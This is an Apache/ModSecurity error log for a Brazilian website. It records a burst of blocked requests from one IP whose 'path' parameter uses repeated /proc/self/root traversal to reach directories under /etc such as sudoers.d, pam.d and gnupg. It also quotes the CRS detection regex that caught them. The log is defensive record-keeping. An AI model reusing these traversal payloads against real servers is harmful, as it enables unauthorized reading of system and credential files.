[Mon Mar 16 10:10:06.031217 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.243.203:34718] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBLpqj1wV0Si-OkefaZwAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:07.387149 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.243.203:34726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBL3jZBu2q05ozVU9G6gAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:08.660054 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:34738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBMI6lpbStxTqkSktfwQAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:10.790871 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:34754] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBMrysWC90G-1nBrA17wAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:12.070971 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:40392] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBNP9ocpUE4ed4uDzefQAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:13.347318 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:40404] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBNbysWC90G-1nBrA18QAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:15.526966 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.243.203:40408] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBN3jZBu2q05ozVU9G7QAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:16.856069 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:40412] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBOLysWC90G-1nBrA18gAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:19.553902 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:40424] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBOpqj1wV0Si-OkefaaAAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:20.897689 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.243.203:44588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBPBXjF1vJNtV6CWrqawAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:22.341630 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.243.203:44602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBPhXjF1vJNtV6CWrqbQAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:24.629989 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:44616] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBQP9ocpUE4ed4uDzegwAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:25.950927 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.243.203:44630] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBQZqj1wV0Si-OkefaaQAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:27.417834 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:44646] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBQ_9ocpUE4ed4uDzehAAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:28.720625 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:44676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBRI6lpbStxTqkSktfxAAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:29.985692 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:44684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBRdSswJuvopo3lOhRVgAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:32.579856 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.243.203:50212] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBSNSswJuvopo3lOhRXQAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:34.063818 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.243.203:50222] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBStSswJuvopo3lOhRXwAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:35.377183 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:50228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBS3jZBu2q05ozVU9G7gAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:36.675085 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:50238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBTI6lpbStxTqkSktfyAAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:43.179800 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:40480] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBUv9ocpUE4ed4uDzelwAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
